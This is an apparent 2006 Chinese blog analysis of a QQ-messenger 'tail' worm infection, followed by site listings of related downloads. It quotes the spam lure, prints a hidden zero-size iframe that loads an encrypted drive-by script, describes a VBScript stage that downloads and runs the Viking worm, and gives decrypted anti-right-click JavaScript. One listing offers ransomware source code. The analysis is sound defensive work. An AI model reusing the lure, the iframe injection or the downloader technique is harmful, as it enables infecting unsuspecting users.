endurer 原创
2006-08-01 第1版
一个网友的电脑中了QQ尾巴,打开QQ好友的对话框就会自动发出如下信息:
---------------------------------
麻烦帮我朋友投个票啦!她正在竞选QQ小姐,参选Q-Zone空间上有她近照,点击为她增加人气,先谢谢喽……
hxxp://Q-Zone.****qq.C0M.%62%30%76%2E%63%6E/cgi-bin/Photo=No.****947561
---------------------------------
点击该链接,会打开一个标题为”手机游戏-彩铃-视频-图片-综合性手机服务网站.支持各种手机机型下载,支持移动、联通!”的网页,并弹出“移动_联通,谢谢您的参与! ”的对话框。
网页中包含如下代码:
---------------------------------
<iframe src=hxxp://web***1.%33%39%63%6F%6D%2E%6F%72%67/ms***/mm***.htm width=0 height=0></iframe>
---------------------------------
mm***.htm 的代码为加密过的脚本程序。
脚本程序共有2部分。
第1部分脚本程序 使用的是JavaScript,其功能是阻止用户选择网页内容、屏蔽右键关键菜单等,以及第二部分脚本程序正确运行所需要的数据。
解密后的代码为见 附录1。
第2部分脚本程序 使用的是VBScript,其功能是利用 Adodb.Stream、Microsoft.XMLHTTP 和 Scripting.FileSystemObject 把某个网站(这里不给出网址了)的MS目录中的文件 HOU1.EXE 保存为 IE临时文件夹中的 g0ld.com,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
Kaspersky 将 HOU1.EXE 报为 Worm.Win32.Viking.r。
瑞星 将 HOU1.EXE 报为 Worm.Viking.aa。
关于这个蠕虫的更多信息,可参考:
遭遇Viking/威金新变种、Trojan-PSW.Win32.WOW.do等(一)
http://blog.csdn.net/Purpleendurer/archive/2006/07/21/950135.aspx
附录1 第1部分脚本程序解密后的代码:
<script language=javascript>
---------------------------------
dH6=2476;
if(document.all)
{
function _dm()
{
return false
};
function _mdm()
{
document.oncontextmenu=_dm;
setTimeout("_mdm()",800)
};
_mdm();
}
document.oncontextmenu=new Function("return false");
function _ndm(e)
{
if (document.layers||window.sidebar)
{
if(e.which!=1)
return false;
}
};
if(document.layers)
{
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown=_ndm;
}
else
{
document.onmouseup=_ndm;
};
sA75=187;
hX40=4188;
function _dws()
{
window.status = " ";
setTimeout("_dws()",100);
};
_dws();
pN54=3615;
oG10=1048;
function _dds()
{
if(document.all)
{
document.onselectstart=function ()
{
return false
};
setTimeout("_dds()",700)
}
};
_dds();
nT70=2191;
oW82=7332;
fH87=190;
rN34=1330;
qA94=2473;
fY59=6474;
wI64=9332;;
_licensed_to_="TEAM iPA";
</script>
---------------------------------
分享到:
相关推荐
Net-Worm.Win32.Kido 专杀
delphi Email-Worm.Win32.Canbis
病毒Net-Worm.Win32.Kido.ih 清除方法
2、从系统注册表项中删除如下所示"%System%\<rnd>.dll": [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost] "netsvcs" 3、重新启动计算机。 4、删除蠕虫文件(位置取决于恶意程序如何侵入计算机) 。 ...
engine-worm.c
微软网站上不去 说明中毒了,可以用此工具杀一下
Worm-贪食蛇游戏-www.javaclimb.com.rar,亲测可以使用,
RKHunter是一款专业的检测系统是否感染rootkit的工具,它通过执行一系列的脚本来确认服务器是否已经感染rootkit。在官方的资料中,RKHunter可以作的事情有: MD5校验测试,检测文件是否有改动 检测rootkit使用的二...
ISBN: 0-201-59616-4 Summary This fully revised and popular book is now up-to-date and even more comprehensive than before. The Indispensable PC Hardware Book 4/e will be 'indispensable' to anyone who...
Win32/Conficker.AA ,也被称为W32/Worm.AHGV , Win32.Worm.Downadup ,净Worm.Win32.Kido.bg ,蠕虫: Win32/Conficker , W32/Conficker.worm.gen ,并末/ Conficker ,是一种恶意蠕虫病毒传播的电脑在当地的网络...
Worm.Win32.Opasoft.a,b,c,d I-Worm.Klez.a,e,f,g,h Win32.Elkern.c 程序先扫描内存,然后再扫描指定的路径。 若发现内存或文件被可感染局域网的病毒感染,程序会自动对局域网进行扫描。 [版本] ...
使用AES进行的加密勒索源代码
win32.lovegate/i,win32.supnot.ay/ax/ah,i-worm.supnot众多变种 win32.parite.a 病毒,运行时,病毒会附加在Explorer.exe文件上以便驻留内存。 病毒会感染本地及其它可以访问的网络驱动器上的*.EXE和*.SCR...
apache-tomcat-6.0.16.zip和源码
蜗轮蜗杆减速器,这是一份蜗轮蜗杆减速器的cad装配图
手机中毒后解决方法,我碰到中毒后,就是使用这个访求解决的。不知对你是否有帮助。
卡巴斯基黑名单验证助手;帮助你了解当前KEY是否已经被列入黑名单
Analysis report for storm worm && botnet
win32.lovegate/i,win32.supnot.ay/ax/ah,i-worm.supnot众多变种 win32.parite.a 病毒,运行时,病毒会附加在Explorer.exe文件上以便驻留内存。 病毒会感染本地及其它可以访问的网络驱动器上的*.EXE和*....
Worm.WhBoy